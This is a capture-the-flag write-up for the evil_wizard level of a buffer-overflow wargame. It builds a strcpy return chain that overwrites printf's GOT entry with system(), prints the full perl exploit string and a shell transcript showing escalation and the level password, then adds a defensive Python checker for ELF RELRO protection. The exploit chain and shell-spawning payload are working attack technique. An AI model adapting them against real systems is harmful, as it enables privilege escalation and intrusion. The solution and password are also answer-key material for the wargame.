[LOB_FC3] hell_fire -> evil_wizard
# Env
- NX
- ascii armor
- random stack
# Technique
- got overwrite
- strcpy plt chain
evil_wizard.c source
Everything after buffer+length is wiped, so there is no argument left to use with a ret sled. A different method is needed, and the hint given is GOT overwriting.
Since the challenge binary also sets its privileges with setreuid, overwriting a GOT entry so that system() gets called will do.
* Overwrite printf's GOT entry with the address of system()
- address of system() : 0x7507c0
- printf PLT : 0x8048424
- printf GOT : 0x8049884
- pop-pop-ret : 0x0804854f (given by the challenge)
- strcpy PLT : 0x8048494
- address of "/bin/sh" : 0x833603
[ strcpy call chain layout ] (one strcpy call per byte; each pop-pop-ret clears the two strcpy arguments off the stack before the next call)
strcpy PLT | pop-pop-ret | printf GOT | &(0xc0)
strcpy PLT | pop-pop-ret | printf GOT+1 | &(0x07)
strcpy PLT | pop-pop-ret | printf GOT+2 | &(0x75)
strcpy PLT | pop-pop-ret | printf GOT+3 | &(0x00)
&system (printf PLT) | dummy | &"/bin/bash"
Exploit code: "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"
```
[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX輯봑?봑뀺봑녽봑$aaaa6?
sh-3.00$ id
uid=504(evil_wizard) gid=504(evil_wizard) groups=503(hell_fire) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$
```
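Added note, not part of the original write-up: the strcpy-into-GOT chain above only works because the loader leaves the GOT writable, which is exactly what RELRO removes. The script below (my own code, not the challenge's) classifies an ELF file as no / partial / full RELRO by parsing its program headers and .dynamic array; with full RELRO the GOT is remapped read-only before main() runs and the first strcpy into printf's GOT entry would fault. The ELF images used for checking are constructed inline by `make_elf32`; pass `open(path, "rb").read()` to `relro_level` for a real binary.

```python
import struct

PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552                 # program header types
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1                          # eager-binding flags

def relro_level(elf: bytes) -> str:
    """Return 'none', 'partial' or 'full' for a little-endian ELF image.
    'full' = PT_GNU_RELRO present and eager binding requested, so the GOT is
    read-only before main() runs and a strcpy into printf@GOT faults."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if elf[4] == 2:                                       # ELFCLASS64
        phoff = struct.unpack_from("<Q", elf, 32)[0]
        phentsize, phnum = struct.unpack_from("<HH", elf, 54)
        ph_fmt, dyn_fmt, off_idx = "<IIQQQQQQ", "<qQ", 2  # p_offset is field 2
    else:                                                 # ELFCLASS32
        phoff = struct.unpack_from("<I", elf, 28)[0]
        phentsize, phnum = struct.unpack_from("<HH", elf, 42)
        ph_fmt, dyn_fmt, off_idx = "<IIIIIIII", "<iI", 1  # p_offset is field 1
    has_relro = bind_now = False
    for i in range(phnum):
        ph = struct.unpack_from(ph_fmt, elf, phoff + i * phentsize)
        if ph[0] == PT_GNU_RELRO:
            has_relro = True
        elif ph[0] == PT_DYNAMIC:                         # walk the .dynamic array
            pos = ph[off_idx]
            while True:
                tag, val = struct.unpack_from(dyn_fmt, elf, pos)
                pos += struct.calcsize(dyn_fmt)
                if tag == DT_NULL:
                    break
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                    bind_now = True
    if not has_relro:
        return "none"
    return "full" if bind_now else "partial"

def make_elf32(relro: bool, bind_now: bool) -> bytes:
    """Constructed minimal ELF32 image (header, phdrs, .dynamic) for testing."""
    phdrs = [(PT_DYNAMIC, 0x80, 0, 0, 0x10, 0x10, 6, 4)]  # .dynamic at file offset 0x80
    if relro:
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    hdr = b"\x7fELF\x01\x01\x01" + b"\0" * 9              # ELFCLASS32, little-endian
    hdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 0, 0, 0)
    img = hdr + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs)
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW if bind_now else 0)
    return img.ljust(0x80, b"\0") + dyn + struct.pack("<iI", DT_NULL, 0)
```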